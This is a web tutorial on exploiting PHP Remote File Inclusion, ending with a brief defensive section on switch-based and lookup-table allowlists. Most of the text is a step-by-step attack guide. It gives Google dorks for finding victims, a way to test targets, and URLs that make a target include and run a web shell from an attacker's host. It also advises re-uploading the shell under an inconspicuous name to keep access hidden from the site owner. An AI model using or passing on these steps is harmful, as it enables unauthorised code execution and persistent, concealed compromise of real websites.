
RFI (Remote File Inclusion)



NOTE: Hacking is an illegal activity, so don't try this on anyone. This tutorial is only for educational purposes. If you want to use this tutorial for miscellaneous purposes, please stop reading.

RFI (Remote File Inclusion) can lead to:
Denial of Service (DoS).
Attacks such as cross-site scripting (XSS).
Code execution on the web server.

Step 1: Find a vulnerable site. For this you will have to use Google dorks. Some of the dorks are like this:

inurl:/index.php?show=
inurl:/index.php?pg=
inurl:/template.php?pagina=
inurl:/index.php?pagina=
inurl:/index.php?inc=
inurl:/includes/include_onde.php?include_file=
inurl:/index.php?page=
inurl:/index.php?site=
inurl:/index.php?cat=
inurl:/index.php?file=
inurl:/db.php?path_local=

Step 2: Test a given website for the vulnerability. After getting the website list from the Google search, we will have to test each website for the vulnerability. To make this easier to understand, I will give you an example: www.targetsite.com. Now we have to add the following keywords to it:
"index.php?page=www.google.com" (without quotes)
And it will become like this:
www.targetsite.com/index.php?page=http://www.google.com

Hit Enter. If the resulting page takes us to the Google homepage, then we can say that the website is vulnerable to attack.

Step 3: Exploitation of the vulnerability. After this we will have to upload the shell to the target website. For this we have to take a few things into consideration: the shell must be in .txt format (shell.txt), like Locus. You can see the shell page and download shells from www.sh3ll.org. Once we have the shell, we will have to upload it to a free hosting service, and the shell page after uploading becomes like this:

www.yourwebsite.com/shell.txt

After this we will have to add the shell page to the vulnerable website. This can be done by adding these keywords to the vulnerable site:

www.targetsite.com/index.php?page=www.yourwebsite.com/shell.txt

Sometimes we will have to use null bytes for it to execute successfully. If we receive an error from "shell.txt", then we will have to try "shell.txt?".

If you have a web shell on the site, but want to make sure you still have access if the owner changes the PHP script, you could upload your shell to their site. Save the text file to your computer and rename it from .txt to .php, then simply upload it using the shell you already have on the site:

www.targetsite.com/index.php?page=www.yourwebsite.com/shell.txt

But be sure to name it something that is less obvious to the site owner than shell.php so that it looks like it is part of the site. Look around at the names of the rest of the pages.

Protect your website

Want to still use index.php?file= but make sure your site isn't vulnerable to RFI? No problem, just use the "switch" statement (like this site uses), which defines the pages beforehand. The code is shown below:

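<?php
// Only pages named here can ever be included; the request value never reaches include().
$page = $_GET['page'] ?? '';
switch ($page) {
    case "page1":
        include("page1.php");
        break;
    case "page2":
        include("page2.php");
        break;
    default:
        // Unknown value: refuse instead of including anything.
        http_response_code(404);
        exit("Page not found");
}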
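
The same allowlist idea as the switch statement above, written as a lookup table with a path check; this is an added example, not code from the original post. It assumes PHP 8, and the `PAGES` table, `resolve_page()` and the `pages/` directory are hypothetical names.

```php
<?php
declare(strict_types=1);
// Vulnerable pattern the allowlist replaces: include($_GET['page']);
// Constructed allowlist: public page key => file shipped with the application.
const PAGES = ['page1' => 'page1.php', 'page2' => 'page2.php'];

/** Map a request value to a real file under $baseDir, or null if not allowed. */
function resolve_page(mixed $key, string $baseDir): ?string
{
    // ?page[]=x arrives as an array, so reject anything that is not a string.
    if (!is_string($key) || !array_key_exists($key, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$key]);
    // Defence in depth: the file must exist and sit inside the base directory.
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

if (PHP_SAPI === 'cli') {
    // Offline demonstration with constructed inputs and a temporary page directory.
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rfi_demo_' . getmypid();
    mkdir($dir);
    foreach (PAGES as $file) { touch($dir . DIRECTORY_SEPARATOR . $file); }
    $inputs = ['page1', 'page2', 'http://example.com/x.txt', '../../etc/passwd', 'page1.php', ['page1']];
    foreach ($inputs as $in) {
        $verdict = resolve_page($in, $dir) === null ? 'rejected' : 'allowed';
        printf("%-30s %s\n", json_encode($in, JSON_UNESCAPED_SLASHES), $verdict);
    }
    foreach (PAGES as $file) { unlink($dir . DIRECTORY_SEPARATOR . $file); }
    rmdir($dir);
} else {
    // Web request: the value from the URL is only ever used as a lookup key.
    $file = resolve_page($_GET['page'] ?? null, __DIR__ . '/pages');
    if ($file === null) {
        http_response_code(404);
        exit('Page not found');
    }
    include $file;
}
```

Keeping PHP's `allow_url_include` setting at its default of Off blocks URL includes at the interpreter level as well.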

Legal Disclaimer : This tutorial is completely for educational purpose only. For any misuse of this tutorial by any means the author will not be held responsible.  

If you have any queries, please comment on my posts.
